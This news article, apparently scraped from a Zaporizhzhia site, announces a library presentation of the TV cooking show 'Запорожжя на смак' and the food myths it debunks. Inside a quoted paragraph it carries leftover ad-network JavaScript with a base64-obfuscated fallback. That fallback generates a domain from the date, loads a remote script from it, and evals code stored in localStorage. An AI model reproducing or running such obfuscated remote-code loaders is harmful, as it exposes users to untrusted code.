«Запоріжжя на смак»: експерти розвінчають міфи про харчування українців

Суспільне Запоріжжя запрошує на презентацію телевізійного проєкту «Запорожжя на смак» 

В суботу, 12 лютого, з 15:00 до 17:00 в Запорізькій обласній універсальній науковій бібліотеці (пр. Соборний, 142) відбудеться перегляд з обговоренням історико-кулінарного шоу «Запорожжя на смак». Команда Суспільне Запоріжжя запрошує усіх, хто хоче познайомитися з авторами проєкту, дізнатися правду про харчові вподобання наших предків-запорожців, а також скуштувати страви, приготовані за історичними рецептами. Вхід вільний. Подія відбудеться згідно з правилами карантинних обмежень, повідомляє Акцент.

Учасниками презентації стануть: В’ячеслав Карпенко, шефкухар, новатор української кухні та Володимир Супруненко, журналіст, письменник, дослідник української та козацької кухні, автор книги «Козацька кухня. Історія. Традиції. Рецепти».

Яка на смак традиційна запорозька їжа 一 скуштують й дізнаються гості події. У статусі «смачного» гостя — правдиві горохляники, загреби та вергуни.

Під час зустрічі з командою фільму дізнаємося, які міфи про харчування українців варто розвіювати, чи дійсно «хліб — усьому голова», як формувалися та змінювалися під впливом історії наші харчові звички.

«Готуючи телевізійний проєкт «Запорожжя на смак», нам вдалося знайти дуже багато цікавого історичного та кулінарного матеріалу. На жаль, ми не змогли про все розказати у 53-х хвилинах телевізійного доробку, говорить продюсерка Суспільне Запоріжжя Наталія Андреєва. — Наприклад, кухарі проєкту приготували 13 традиційних локальних страв, але у фінальний монтаж увійшли лише 11 з них. Тож вирішили розказати більше про те, що нам вдалося дізнатися під час наших історико-кулінарних розвідок. Прем’єра телевізійного проєкту на телеканалі UA: ЗАПОРІЖЖЯ відбулася 1 січня. Зрозуміло, що дехто не зміг подивитися шоу в ефірі, тож вирішили повторити показ фільму саме в бібліотеці. Адже туди ходять ті, хто хоче знати більше, хто цікавиться і читає. Таким чином, сподіваємося ще й отримати відгук про нашу роботу». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Історико-кулінарне експериментальне шоу «Запорожжя на смак» було створено на Суспільне Запоріжжя восени 2021 року. 1 січня 2022 секрети давної кухні степових українців побачила вся Україна — в новорічну ніч фільм транслювали всі регіональні телеканали Суспільного.  Онлайн переглянути стрічку можна на ютуб-каналі Суспільне Запоріжжя.

Проєкт «Запорожжя на смак» розповідає, що їли на території, яка вважалася козацькою вольницею (сучасні Запорізька, Дніпропетровська, Донецька і частково Миколаївська області), як це вплинуло на українську кухню і чи смакують ці страви сьогодні. Крім того, на глядачів очікує розвінчування кулінарних міфів. Наприклад, історичні дані свідчать про те, що козаки переважно були вегетаріанцями, а сало експортували в Європу для пушкарства, що основою козацької кухні були риба та каша, а, отже, образ українця-салоїда — вигадка, яка з’явилась не без втручання Російської імперії.

Подписывайтесь на Акцент в

   (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/zaporizhzhya-na-smak-eksperti-rozvinchayut-mifi-pro-harchuvannya-ukrayintsiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top